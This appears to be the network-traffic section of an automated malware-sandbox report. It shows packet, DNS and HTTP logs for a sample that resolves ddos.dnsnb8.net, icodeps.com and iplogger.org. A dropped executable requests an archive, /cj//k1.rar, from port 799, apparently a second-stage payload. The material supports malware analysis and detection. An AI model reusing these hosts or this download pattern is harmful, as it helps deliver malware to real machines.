                                                                                  Jul 24, 2024 17:33:00.043958902 CEST49699799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:00.044204950 CEST7994969944.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.044256926 CEST49699799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:00.046525955 CEST49699799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:00.047475100 CEST7994969944.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.047544956 CEST49699799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:00.057456017 CEST7994969944.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.619029045 CEST44349700172.232.25.148192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.619132042 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:33:00.798557043 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:33:00.798595905 CEST44349700172.232.25.148192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.798922062 CEST44349700172.232.25.148192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.798994064 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:33:00.806597948 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:33:00.852499962 CEST44349700172.232.25.148192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.939225912 CEST44349700172.232.25.148192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.939316988 CEST44349700172.232.25.148192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.939342976 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:33:00.939421892 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:33:00.947741985 CEST49700443192.168.2.7172.232.25.148
                                                                                  Jul 24, 2024 17:33:00.947808027 CEST44349700172.232.25.148192.168.2.7
                                                                                  Jul 24, 2024 17:33:01.067576885 CEST4970180192.168.2.767.225.218.41
                                                                                  Jul 24, 2024 17:33:01.072664022 CEST804970167.225.218.41192.168.2.7
                                                                                  Jul 24, 2024 17:33:01.073975086 CEST4970180192.168.2.767.225.218.41
                                                                                  Jul 24, 2024 17:33:01.076133013 CEST4970180192.168.2.767.225.218.41
                                                                                  Jul 24, 2024 17:33:01.081332922 CEST804970167.225.218.41192.168.2.7
                                                                                  Jul 24, 2024 17:33:01.627686024 CEST804970167.225.218.41192.168.2.7
                                                                                  Jul 24, 2024 17:33:01.630676031 CEST4970180192.168.2.767.225.218.41
                                                                                  Jul 24, 2024 17:33:01.775455952 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:01.780492067 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:01.780575037 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:01.801973104 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:01.807554960 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.602264881 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.602329969 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.603635073 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.603648901 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.603687048 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.606439114 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.606453896 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.606482983 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.606503010 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.609065056 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.609078884 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.609091043 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.609111071 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.609127045 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.611963987 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.611979961 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.612008095 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.612035990 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.614866018 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.614912033 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.615717888 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.615765095 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.616863966 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.616878033 CEST804970213.248.148.254192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.616911888 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.616928101 CEST4970280192.168.2.713.248.148.254
                                                                                  Jul 24, 2024 17:33:02.713464975 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:02.713516951 CEST44349703172.67.132.113192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.713720083 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:02.714843035 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:02.714857101 CEST44349703172.67.132.113192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.215061903 CEST44349703172.67.132.113192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.215146065 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:03.219728947 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:03.219744921 CEST44349703172.67.132.113192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.219974995 CEST44349703172.67.132.113192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.220030069 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:03.220407963 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:03.264508963 CEST44349703172.67.132.113192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.508646011 CEST49704799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:03.513818979 CEST7994970444.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.513907909 CEST49704799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:03.514079094 CEST49704799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:03.518892050 CEST7994970444.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.732316971 CEST44349703172.67.132.113192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.732410908 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:03.732414007 CEST44349703172.67.132.113192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.732465029 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:03.844597101 CEST49703443192.168.2.7172.67.132.113
                                                                                  Jul 24, 2024 17:33:03.844647884 CEST44349703172.67.132.113192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.941831112 CEST7994970444.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.941904068 CEST49704799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:03.941991091 CEST7994970444.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:03.942040920 CEST49704799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:03.942990065 CEST49704799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:03.947936058 CEST7994970444.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:06.257886887 CEST49705799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:06.272443056 CEST7994970544.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:06.272576094 CEST49705799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:06.272958994 CEST49705799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:06.277782917 CEST7994970544.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:06.916256905 CEST7994970544.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:06.916378975 CEST49705799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:06.946146011 CEST7994970544.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:06.946259975 CEST49705799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:06.948009968 CEST49705799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:06.953454018 CEST7994970544.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:09.050967932 CEST49706799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:09.072537899 CEST7994970644.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:09.072675943 CEST49706799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:09.072983980 CEST49706799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:09.077866077 CEST7994970644.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:09.618141890 CEST7994970644.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:09.618163109 CEST7994970644.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:09.618171930 CEST7994970644.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:09.618304968 CEST49706799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:09.619366884 CEST49706799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:09.626207113 CEST7994970644.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:12.018203020 CEST49708799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:12.026123047 CEST7994970844.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:12.026200056 CEST49708799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:12.026657104 CEST49708799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:12.031534910 CEST7994970844.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:12.688983917 CEST7994970844.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:12.689014912 CEST7994970844.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:12.689053059 CEST49708799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:12.689081907 CEST49708799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:12.689264059 CEST7994970844.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:12.689305067 CEST49708799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:12.713597059 CEST49708799192.168.2.744.221.84.105
                                                                                  Jul 24, 2024 17:33:12.722480059 CEST7994970844.221.84.105192.168.2.7
                                                                                  Jul 24, 2024 17:33:13.162898064 CEST804970167.225.218.41192.168.2.7
                                                                                  Jul 24, 2024 17:33:13.162977934 CEST4970180192.168.2.767.225.218.41
                                                                                  Jul 24, 2024 17:33:36.941479921 CEST4970180192.168.2.767.225.218.41
                                                                                  Jul 24, 2024 17:33:36.941555023 CEST4970280192.168.2.713.248.148.254
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jul 24, 2024 17:32:58.302311897 CEST6538953192.168.2.71.1.1.1
                                                                                  Jul 24, 2024 17:32:58.405122042 CEST53653891.1.1.1192.168.2.7
                                                                                  Jul 24, 2024 17:32:58.441833973 CEST5160353192.168.2.71.1.1.1
                                                                                  Jul 24, 2024 17:32:58.799782991 CEST53516031.1.1.1192.168.2.7
                                                                                  Jul 24, 2024 17:33:00.955671072 CEST6132253192.168.2.71.1.1.1
                                                                                  Jul 24, 2024 17:33:01.066565990 CEST53613221.1.1.1192.168.2.7
                                                                                  Jul 24, 2024 17:33:01.634449005 CEST6214553192.168.2.71.1.1.1
                                                                                  Jul 24, 2024 17:33:01.744776011 CEST53621451.1.1.1192.168.2.7
                                                                                  Jul 24, 2024 17:33:02.641992092 CEST6347053192.168.2.71.1.1.1
                                                                                  Jul 24, 2024 17:33:02.652383089 CEST53634701.1.1.1192.168.2.7
                                                                                  Jul 24, 2024 17:33:31.663727999 CEST5357016162.159.36.2192.168.2.7
                                                                                  Jul 24, 2024 17:33:32.189028978 CEST5362553192.168.2.71.1.1.1
                                                                                  Jul 24, 2024 17:33:32.239583015 CEST53536251.1.1.1192.168.2.7
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Jul 24, 2024 17:32:58.302311897 CEST192.168.2.71.1.1.10x99deStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:32:58.441833973 CEST192.168.2.71.1.1.10x3bcbStandard query (0)www.icodeps.comA (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:00.955671072 CEST192.168.2.71.1.1.10xc008Standard query (0)ww99.icodeps.comA (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:01.634449005 CEST192.168.2.71.1.1.10xd7c5Standard query (0)ww12.icodeps.comA (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:02.641992092 CEST192.168.2.71.1.1.10xf35Standard query (0)iplogger.orgA (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:32.189028978 CEST192.168.2.71.1.1.10x6e95Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Jul 24, 2024 17:32:58.405122042 CEST1.1.1.1192.168.2.70x99deNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:32:58.799782991 CEST1.1.1.1192.168.2.70x3bcbNo error (0)www.icodeps.com172.232.25.148A (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:32:58.799782991 CEST1.1.1.1192.168.2.70x3bcbNo error (0)www.icodeps.com172.232.31.180A (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:32:58.799782991 CEST1.1.1.1192.168.2.70x3bcbNo error (0)www.icodeps.com172.232.4.213A (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:01.066565990 CEST1.1.1.1192.168.2.70xc008No error (0)ww99.icodeps.com67.225.218.41A (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:01.744776011 CEST1.1.1.1192.168.2.70xd7c5No error (0)ww12.icodeps.com765534.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:01.744776011 CEST1.1.1.1192.168.2.70xd7c5No error (0)765534.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:01.744776011 CEST1.1.1.1192.168.2.70xd7c5No error (0)765534.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:02.652383089 CEST1.1.1.1192.168.2.70xf35No error (0)iplogger.org172.67.132.113A (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:02.652383089 CEST1.1.1.1192.168.2.70xf35No error (0)iplogger.org104.21.4.208A (IP address)IN (0x0001)false
                                                                                  Jul 24, 2024 17:33:32.239583015 CEST1.1.1.1192.168.2.70x6e95Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                  • www.icodeps.com
                                                                                  • iplogger.org
                                                                                  • ddos.dnsnb8.net:799
                                                                                  • ww99.icodeps.com
                                                                                  • ww12.icodeps.com
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.74969944.221.84.1057992876C:\Users\user\AppData\Local\Temp\MDSxhU.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jul 24, 2024 17:32:58.785686016 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: ddos.dnsnb8.net:799
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.74970167.225.218.41803212C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jul 24, 2024 17:33:01.076133013 CEST218OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                  Cache-Control: no-cache
                                                                                  Host: ww99.icodeps.com
                                                                                  Connection: Keep-Alive
                                                                                  Jul 24, 2024 17:33:01.627686024 CEST350INHTTP/1.1 302 Moved Temporarily
                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Date: Wed, 24 Jul 2024 15:33:01 GMT
                                                                                  Location: http://ww12.icodeps.com/?usid=26&utid=7334446481
                                                                                  Pragma: no-cache
                                                                                  Connection: Keep-Alive
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Content-Length: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.74970213.248.148.254803212C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jul 24, 2024 17:33:01.801973104 CEST242OUTGET /?usid=26&utid=7334446481 HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                  Cache-Control: no-cache
                                                                                  Connection: Keep-Alive
                                                                                  Host: ww12.icodeps.com
                                                                                  Jul 24, 2024 17:33:02.602264881 CEST1236INHTTP/1.1 200 OK
                                                                                  Date: Wed, 24 Jul 2024 15:33:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Server: nginx
                                                                                  Vary: Accept-Encoding
                                                                                  Vary: Accept-Encoding
                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_KUn2QqA8onBtTl2dDA+Tc0sz9jjFS4GTWhTuJb4r9BkmG1pUIXKakwDuxn+OreG1D5yjyP5yvVtaScxD+iKZeA==
                                                                                  Accept-CH: viewport-width
                                                                                  Accept-CH: dpr
                                                                                  Accept-CH: device-memory
                                                                                  Accept-CH: rtt
                                                                                  Accept-CH: downlink
                                                                                  Accept-CH: ect
                                                                                  Accept-CH: ua
                                                                                  Accept-CH: ua-full-version
                                                                                  Accept-CH: ua-platform
                                                                                  Accept-CH: ua-platform-version
                                                                                  Accept-CH: ua-arch
                                                                                  Accept-CH: ua-model
                                                                                  Accept-CH: ua-mobile
                                                                                  Accept-CH-Lifetime: 30
                                                                                  X-Domain: icodeps.com
                                                                                  X-Subdomain: ww12
                                                                                  Data Raw: 31 64 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 4b 55 6e 32 51 71 41 38 6f 6e 42 74 54 6c 32 64 44 41 2b 54 63 30 73 7a 39 6a 6a 46 53 34 47 54 57 68 54 75 4a 62 34 72 39 42 6b 6d 47 31 70 55 49 58 4b 61 6b 77 44 75 78 6e 2b 4f 72 65 47 31 44 35 79 6a 79 50 35 79 76 56 74 61 53 63 78 44 2b 69 4b 5a 65 41 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED]
                                                                                  Data Ascii: 1d1f<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_KUn2QqA8onBtTl2dDA+Tc0sz9jjFS4GTWhTuJb4r9BkmG1pUIXKakwDuxn+OreG1D5yjyP5yvVtaScxD+iKZeA==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-wid
                                                                                  Jul 24, 2024 17:33:02.603635073 CEST1236INData Raw: 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 63 6f 64 65 70 73 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65
                                                                                  Data Ascii: th, initial-scale=1, shrink-to-fit=no"/> <title>icodeps.com</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;displ
                                                                                  Jul 24, 2024 17:33:02.603648901 CEST1236INData Raw: 0a 0a 2e 68 65 61 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 72 65 6d 20 31 72 65 6d 20 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 38 34 38 34 38
                                                                                  Data Ascii: .header { padding:1rem 1rem 0; overflow:hidden;}h1 { color:#848484; font-size:1.5rem;}.header-text-color:visited,.header-text-color:link,.header-text-color { color:#848484;}.comp-is-parked { margin: 4px 0 2px
                                                                                  Jul 24, 2024 17:33:02.606439114 CEST1236INData Raw: 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 34 38 34 38 34 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6d 70 2d 73 70 6f 6e 73 6f 72 65 64 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 7d 0a
                                                                                  Data Ascii: { color: #848484; } .comp-sponsored { margin-left: 0; } .wrapper1 { max-width:1500px; margin-left:auto; margin-right:auto; } .wrapper2 { background:url('//d38psrni17bvxu.c
                                                                                  Jul 24, 2024 17:33:02.606453896 CEST1236INData Raw: 47 67 39 49 6a 49 30 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 43 41 77 61 44 49 30 64 6a 49 30 53 44 42 36 49 69 42 6d 61 57 78 73 50 53 4a 75 62 32 35 6c 49 69 38 2b 50 48 42 68 64 47 67 67 5a 44 30 69 54 54 55 75 4f 44 67 67 4e 43 34
                                                                                  Data Ascii: Gg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> </head><body id="afd"><div id="plBanner"><script id="parklogic" type="t
                                                                                  Jul 24, 2024 17:33:02.609065056 CEST1236INData Raw: 62 65 72 27 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 6f 6e 74 2d 53 69 7a 65 73 20 61 6e 64 20 4c 69 6e 65 2d 48 65 69 67 68 74 73 0a 20 20 20 20 20 20 20 20 27 66 6f 6e 74 53 69 7a 65 41 74 74 72 69 62 75 74
                                                                                  Data Ascii: ber': 3, // Font-Sizes and Line-Heights 'fontSizeAttribution': 14, 'fontSizeTitle': 24, 'lineHeightTitle': 34, // Colors 'colorAttribution': '#aaa', 'colorTitleLink': '#0277bd',
                                                                                  Jul 24, 2024 17:33:02.609078884 CEST776INData Raw: 57 45 31 59 54 42 6a 59 7a 4e 38 66 48 78 38 66 44 46 38 66 44 42 38 4d 48 78 38 66 48 77 78 66 48 78 38 66 48 77 77 66 44 42 38 66 48 78 38 66 48 78 38 66 48 78 38 4d 48 77 77 66 48 77 77 66 48 78 38 4d 48 77 77 66 46 63 78 4d 44 31 38 66 44 46
                                                                                  Data Ascii: WE1YTBjYzN8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fHx8MHwwfHwwfHx8MHwwfFcxMD18fDF8VzEwPXxjNTQ2MjU2MDIxYjgxYzM5YmFiOWRiMGY3NWEzYWFiNmYzN2FhNjlhfDB8ZHAtdGVhbWludGVybmV0MDlfM3BofDB8MHx8fA=='; var domain='icodeps.com'; var scriptP
                                                                                  Jul 24, 2024 17:33:02.609091043 CEST1236INData Raw: 72 6d 4c 65 6e 67 74 68 27 3a 20 34 30 2c 27 61 64 74 65 73 74 27 3a 20 74 72 75 65 2c 27 63 6c 69 63 6b 74 72 61 63 6b 55 72 6c 27 3a 20 27 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 0d 0a 31 30 30 30 0d 0a 68 6f 73 74 20 2b 20 27 2f 74 72 61
                                                                                  Data Ascii: rmLength': 40,'adtest': true,'clicktrackUrl': '//' + location.1000host + '/track.php?','attributionText': 'Ads','colorAttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttributi
                                                                                  Jul 24, 2024 17:33:02.611963987 CEST1236INData Raw: 61 64 65 64 43 61 6c 6c 62 61 63 6b 54 72 69 67 67 65 72 65 64 20 3d 20 74 72 75 65 3b 69 66 20 28 28 73 74 61 74 75 73 2e 66 61 69 6c 6c 69 73 74 65 64 20 3d 3d 3d 20 74 72 75 65 20 7c 7c 20 73 74 61 74 75 73 2e 66 61 69 6c 6c 69 73 74 65 64 20
                                                                                  Data Ascii: adedCallbackTriggered = true;if ((status.faillisted === true || status.faillisted == "true" || status.blocked === true || status.blocked == "true" ) && status.error_code != 25) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(
                                                                                  Jul 24, 2024 17:33:02.611979961 CEST1236INData Raw: 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67
                                                                                  Data Ascii: Query(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" + encodeURIComponent(uniqueTrackingID));}if ((status.adult === true || status.adult == "true") && !isAdult) {ajaxQuery(scriptPath + "/track
                                                                                  Jul 24, 2024 17:33:02.614866018 CEST1236INData Raw: 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67 67 6c 65 3d 61 6e 73 77 65 72 63 68 65 63 6b 26 61 6e 73 77 65
                                                                                  Data Ascii: track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=answercheck&answer=rejected&uid=" + encodeURIComponent(uniqueTrackingID));}}};var x = function (obj1, obj2) {if (typeof obj1 != "object")obj1 = {};for (var key in obj2)obj1[key]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
